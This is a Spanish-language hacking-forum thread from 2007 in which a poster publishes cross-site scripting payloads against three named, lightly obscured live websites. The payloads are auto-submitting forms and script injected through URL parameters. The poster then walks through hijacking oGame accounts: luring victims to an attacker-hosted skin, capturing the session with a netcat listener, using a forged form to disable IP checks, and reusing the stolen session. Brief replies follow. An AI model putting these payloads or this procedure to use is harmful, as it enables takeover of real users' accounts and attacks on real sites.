Cross Site Scripting (XSS)

Iniciado por yeikos, 22 Abril 2007, 04:20 AM

0 Miembros y 1 Visitante están viendo este tema.

yeikos

Cross Site Scripting (XSS)

Dado que la información aqui mostrada no muestra links directos a terceros, pero que se puede inferir el link, el que desee que se quite algun link aqui mostrado, hagalo saber..

El autor no se hace responsable de los malos usos que se le de a este documento...


<META HTTP-EQUIV="Refresh" CONTENT="1; URL=javascript:document.forms[0].submit()">
<form action="http:// s e x y o n o .com/grupos/" method="POST">
<input type="hidden" name="buscargrupo" value="
<script>alert(String.fromCharCode(88,83,83,32,66,89,32,89,69,73,75,48,83))</script>">
</form>



http://www. v o t a m i c u e r p o .com/usuario.php?funcion=bloqueados&usuario=
<SCRIPT>alert(String.fromCharCode(88,83,83,32,66,89,32,89,69,73,75,48,83));</script>&
Submit=Bloquear



http://ogameXXX.de/game/redir.php?url=
"><script>alert(String.fromCharCode(88,83,83,32,66,89,32,89,69,73,75,48,83))</script>


He encontrado más XSS esta semana, y varias son de páginas de alto prestigio, tipo MSN Hotmail, MSN Live, etc. Pero prefiero no publicarlo para evitar malos usos... a cambio les he dejado esto.

Os depcepcionaré al deciros que el último XSS no os servirá para lo que estais pensando, pues los contenidos de la cookie de oGame caracen de valor administrativo.

Pero quizás os alegre saber que en la variable session se deposita todo el valor necesario para administrar cualquier cuenta, tan solo es necesario que la víctima utilice un skin alojado en nuestro servidor o preguntarle el valor de la session mediante IS. Al desconocer su valor, no le dará ninguna importancia a esta.

Una vez cambiado el skin, desde nuestra máquina ponemos el netcat a escuchar el puerto 80 (nc -vv -L -p 80) para capturar la session, cerramos la conexión y a continuación hacemos que la victima ingrese en este formulario para desactivarle el IP-CHECK y así poder acceder a la misma session con IPs diferentes.

<META HTTP-EQUIV="Refresh" CONTENT="1; URL=javascript:document.forms[0].submit()">
<form action="options.php?session=SESSION&mode=change" method="POST" >
<input type="hidden" name="dpath" value="http://127.0.0.1/skin/">
<input type="checkbox" name="design" checked>
<input type="checkbox" name="noipcheck" checked>
</form>


Deberá identificarse de nuevo, así que volveremos a capturar la session, y una vez capturada ya podremos acceder a la cuenta...

<frameset framespacing="0" border="0" cols="190,*" frameborder="0">
<frame name="Inhalt" target="Hauptframe" src="http:/ogameXXX/game/leftmenu.php?session=SESSION"
noresize marginwidth="0" marginheight="0">
<frame name="Hauptframe" src="http://ogameXXX.de/game/overview.php?session=SESSION" target="_blank">
<noframes></noframes></frameset>


Quien quiera compartir información de cualquier tipo o tenga proyectos en mente, estaré encatado de conversar/devatir nuevas ideas, ¡Hasta entonces!  :P

PD: Por favor, eviten el uso del nombre de las páginas de las primeras dos inyecciones XSS para que google no las incluya en su buscador, gracias.

samuel123

Desde msdos puedo  tambien ponerme a escuchar el puerto 80?

salu2

yeikos

No, necesitas alguna herramienta tipo Netcat.

Man-In-the-Middle

Mas que Palmas, para esta informacion , clap clap clap